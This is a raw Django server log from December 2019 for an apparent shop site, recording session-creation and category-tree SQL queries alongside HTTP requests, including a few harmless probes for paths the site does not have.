args=('e0u4ni0ove70ookmqgs7l60mfsbx5euv',) DEBUG 2019-12-10 06:50:05,300 utils 32196 139885018363648 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('prcv2v2yxv0d7dif005812i5cdthgl6v', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T06:50:05.298998+00:00'::timestamptz); args=('prcv2v2yxv0d7dif005812i5cdthgl6v', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 6, 50, 5, 298998, tzinfo=)) DEBUG 2019-12-10 06:50:05,302 utils 32196 139885028853504 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('e0u4ni0ove70ookmqgs7l60mfsbx5euv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T06:50:05.300571+00:00'::timestamptz); args=('e0u4ni0ove70ookmqgs7l60mfsbx5euv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 6, 50, 5, 300571, tzinfo=)) [10/Dec/2019 06:50:05] "HEAD /login/?next=/shop/category/ HTTP/1.0" 200 1814 [10/Dec/2019 06:50:05] "HEAD /login/?next=/auth/user/ HTTP/1.0" 200 1806 Not Found: /robots.txt Not Found: /robots.txt [10/Dec/2019 06:50:05] "GET /robots.txt HTTP/1.0" 404 6626 [10/Dec/2019 06:50:05] "GET /robots.txt HTTP/1.0" 404 6626 [10/Dec/2019 06:50:05] "GET /auth/user/ HTTP/1.0" 302 0 [10/Dec/2019 06:50:05] "GET /shop/category/ HTTP/1.0" 302 0 DEBUG 2019-12-10 06:50:05,779 utils 32196 139885018363648 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'y4u9h1mdr3pcmx0zvo843vdvhzjg12og' LIMIT 1; args=('y4u9h1mdr3pcmx0zvo843vdvhzjg12og',) DEBUG 2019-12-10 06:50:05,781 utils 32196 139885028853504 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '1df1c96bfh4knih0xhvz97htti52ki1p' LIMIT 1; args=('1df1c96bfh4knih0xhvz97htti52ki1p',) DEBUG 2019-12-10 06:50:05,782 utils 32196 139885018363648 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('y4u9h1mdr3pcmx0zvo843vdvhzjg12og', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T06:50:05.780811+00:00'::timestamptz); args=('y4u9h1mdr3pcmx0zvo843vdvhzjg12og', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 6, 50, 5, 780811, tzinfo=)) DEBUG 2019-12-10 06:50:05,783 utils 32196 139885028853504 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('1df1c96bfh4knih0xhvz97htti52ki1p', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T06:50:05.781816+00:00'::timestamptz); args=('1df1c96bfh4knih0xhvz97htti52ki1p', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 6, 50, 5, 781816, tzinfo=)) [10/Dec/2019 06:50:05] "GET /login/?next=/shop/category/ HTTP/1.0" 200 1814 [10/Dec/2019 06:50:05] "GET /login/?next=/auth/user/ HTTP/1.0" 200 1806 [10/Dec/2019 06:50:05] "GET /auth/user/ HTTP/1.0" 302 0 [10/Dec/2019 06:50:05] "GET /shop/category/ HTTP/1.0" 302 0 DEBUG 2019-12-10 06:50:06,059 utils 32196 139885018363648 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ckmh5w673dlqme157iysyygh9ds5rx0e' LIMIT 1; args=('ckmh5w673dlqme157iysyygh9ds5rx0e',) DEBUG 2019-12-10 06:50:06,060 utils 32196 139885028853504 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'wmg8i4m14mib923l57nuvpk6lanuy2vv' LIMIT 1; args=('wmg8i4m14mib923l57nuvpk6lanuy2vv',) DEBUG 2019-12-10 06:50:06,061 utils 32196 139885018363648 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ckmh5w673dlqme157iysyygh9ds5rx0e', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T06:50:06.059759+00:00'::timestamptz); args=('ckmh5w673dlqme157iysyygh9ds5rx0e', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 6, 50, 6, 59759, tzinfo=)) DEBUG 2019-12-10 06:50:06,062 utils 32196 139885028853504 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('wmg8i4m14mib923l57nuvpk6lanuy2vv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T06:50:06.061023+00:00'::timestamptz); args=('wmg8i4m14mib923l57nuvpk6lanuy2vv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 6, 50, 6, 61023, tzinfo=)) [10/Dec/2019 06:50:06] "GET /login/?next=/auth/user/ HTTP/1.0" 200 1806 [10/Dec/2019 06:50:06] "GET /login/?next=/shop/category/ HTTP/1.0" 200 1814 [10/Dec/2019 06:54:16] "GET / HTTP/1.0" 302 0 [10/Dec/2019 06:55:49] "GET / HTTP/1.0" 302 0 [10/Dec/2019 07:05:02] "GET / HTTP/1.0" 302 0 [10/Dec/2019 07:10:05] "GET / HTTP/1.0" 302 0 [10/Dec/2019 07:15:08] "GET / HTTP/1.0" 302 0 [10/Dec/2019 07:20:11] "GET / HTTP/1.0" 302 0 [10/Dec/2019 07:25:13] "GET / HTTP/1.0" 302 0 [10/Dec/2019 07:30:16] "GET / HTTP/1.0" 302 0 Not Found: /api/api-token-auth/ [10/Dec/2019 07:33:32] "OPTIONS /api/api-token-auth/ HTTP/1.0" 404 6657 [10/Dec/2019 07:35:18] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 07:35:51,391 utils 32196 139885028853504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 07:35:51,396 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 07:35:51,398 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 07:35:51,400 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 07:35:51,402 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 07:35:51,405 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 07:35:51,407 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 07:35:51,409 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 07:35:51,411 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 07:35:51,413 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 07:35:51,415 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 07:35:51] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 07:35:51] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [10/Dec/2019 07:35:51] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [10/Dec/2019 07:35:52] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [10/Dec/2019 07:35:52] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [10/Dec/2019 07:35:52] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [10/Dec/2019 07:35:52] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [10/Dec/2019 07:35:53] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [10/Dec/2019 07:35:53] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [10/Dec/2019 07:35:54] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [10/Dec/2019 07:35:54] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 DEBUG 2019-12-10 07:36:07,205 utils 32196 139885061072640 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 07:36:07,213 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 07:36:07,217 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 07:36:07,222 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 07:36:07,226 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 07:36:07,230 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 07:36:07,234 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 07:36:07,238 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 07:36:07,242 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 07:36:07,246 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 07:36:07,252 utils 32196 139885061072640 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 07:36:07] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 07:38:55,101 utils 32196 139885061072640 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 07:38:55,108 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 07:38:55,112 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 07:38:55,116 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 07:38:55,120 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 07:38:55,124 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 07:38:55,128 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 07:38:55,132 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 07:38:55,136 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 07:38:55,140 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 07:38:55,144 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 07:38:55] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 07:40:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 07:40:06,746 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 's39mfp1hl39t1hrzh4ppr6hjqmgbwz7s' LIMIT 1; args=('s39mfp1hl39t1hrzh4ppr6hjqmgbwz7s',) DEBUG 2019-12-10 07:40:06,748 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('s39mfp1hl39t1hrzh4ppr6hjqmgbwz7s', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T07:40:06.747117+00:00'::timestamptz); args=('s39mfp1hl39t1hrzh4ppr6hjqmgbwz7s', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 7, 40, 6, 747117, tzinfo=)) [10/Dec/2019 07:40:06] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 07:41:26] "GET / HTTP/1.0" 302 0 [10/Dec/2019 07:50:05] "GET / HTTP/1.0" 302 0 [10/Dec/2019 07:58:44] "GET / HTTP/1.0" 302 0 [10/Dec/2019 08:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [10/Dec/2019 08:05:03] "GET / HTTP/1.0" 302 0 [10/Dec/2019 08:10:06] "GET / HTTP/1.0" 302 0 [10/Dec/2019 08:15:08] "GET / HTTP/1.0" 302 0 [10/Dec/2019 08:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [10/Dec/2019 08:20:11] "GET / HTTP/1.0" 302 0 [10/Dec/2019 08:25:13] "GET / HTTP/1.0" 302 0 [10/Dec/2019 08:30:16] "GET / HTTP/1.0" 302 0 [10/Dec/2019 08:35:19] "GET / HTTP/1.0" 302 0 [10/Dec/2019 08:40:21] "GET / HTTP/1.0" 302 0 [10/Dec/2019 08:45:23] "GET / HTTP/1.0" 302 0 [10/Dec/2019 08:50:26] "GET / HTTP/1.0" 302 0 [10/Dec/2019 08:55:28] "GET / HTTP/1.0" 302 0 [10/Dec/2019 09:05:02] "GET /whm-server-status HTTP/1.0" 301 0 [10/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [10/Dec/2019 09:05:34] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [10/Dec/2019 09:05:36] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=107 HTTP/1.0" 404 6705 Not Found: /newslist.asp [10/Dec/2019 09:05:37] "GET /newslist.asp?type=4&id=1294 HTTP/1.0" 404 6649 [10/Dec/2019 09:10:06] "GET / HTTP/1.0" 302 0 [10/Dec/2019 09:15:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 09:18:28,332 utils 32196 139885061072640 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 09:18:28,336 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 09:18:28,339 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 09:18:28,341 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 09:18:28,343 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 09:18:28,345 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 09:18:28,347 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 09:18:28,349 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 09:18:28,352 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 09:18:28,354 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 09:18:28,357 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 09:18:28] "GET /api/v1/categories/ HTTP/1.0" 200 1619 